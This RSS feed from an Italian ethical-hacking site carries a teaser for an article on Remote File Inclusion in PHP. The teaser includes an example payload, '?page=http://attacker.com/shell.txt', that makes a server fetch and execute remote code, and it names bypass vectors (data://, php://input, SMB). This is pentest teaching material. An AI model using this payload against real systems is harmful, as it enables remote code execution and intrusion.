<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>File-Inclusion on Ethical Hacking | Pentest e Sicurezza Informatica | Hackita</title><link>https://hackita.it/tags/file-inclusion/</link><description>Recent content in File-Inclusion on Ethical Hacking | Pentest e Sicurezza Informatica | Hackita</description><generator>Hugo</generator><language>it</language><lastBuildDate>Wed, 18 Mar 2026 00:00:00 +0000</lastBuildDate><atom:link href="https://hackita.it/tags/file-inclusion/index.xml" rel="self" type="application/rss+xml"/><item><title>Remote File Inclusion (RFI): RCE via URL, Wrapper Bypass e SMB Attack</title><link>https://hackita.it/articoli/rfi/</link><pubDate>Wed, 18 Mar 2026 00:00:00 +0000</pubDate><guid>https://hackita.it/articoli/rfi/</guid><description>&lt;p&gt;Se la &lt;a href="https://hackita.it/articoli/lfi"&gt;LFI&lt;/a&gt; include file locali e li esegue, la &lt;strong&gt;RFI&lt;/strong&gt; include file &lt;strong&gt;remoti&lt;/strong&gt; — dal server dell&amp;rsquo;attaccante. L&amp;rsquo;applicazione PHP chiama &lt;code&gt;include($_GET['page'])&lt;/code&gt;, l&amp;rsquo;attaccante inserisce &lt;code&gt;?page=http://attacker.com/shell.txt&lt;/code&gt;, il server scarica &lt;code&gt;shell.txt&lt;/code&gt; dal server dell&amp;rsquo;attaccante, lo interpreta come PHP, lo esegue. &lt;strong&gt;RCE in un parametro URL.&lt;/strong&gt; Zero passaggi intermedi, zero log poisoning, zero upload — il server va a prendere il tuo codice e lo esegue da solo.&lt;/p&gt;
&lt;p&gt;L&amp;rsquo;unico ostacolo &amp;ldquo;teorico&amp;rdquo; è che PHP richiede &lt;code&gt;allow_url_include=On&lt;/code&gt; per includere URL remote. Questa direttiva è disabilitata di default dal 2006. Fine della storia? No. Nel 2026 la trovo ancora attiva nel &lt;strong&gt;3% dei server&lt;/strong&gt; — sistemi legacy, XAMPP/WAMP di sviluppo finiti in produzione, Docker image obsolete, misconfiguration. E anche quando è &lt;code&gt;Off&lt;/code&gt;, ci sono &lt;strong&gt;bypass&lt;/strong&gt;: &lt;code&gt;data://&lt;/code&gt;, &lt;code&gt;php://input&lt;/code&gt;, e su Windows il &lt;strong&gt;vettore SMB&lt;/strong&gt; che non richiede affatto &lt;code&gt;allow_url_include&lt;/code&gt;.&lt;/p&gt;</description></item></channel></rss>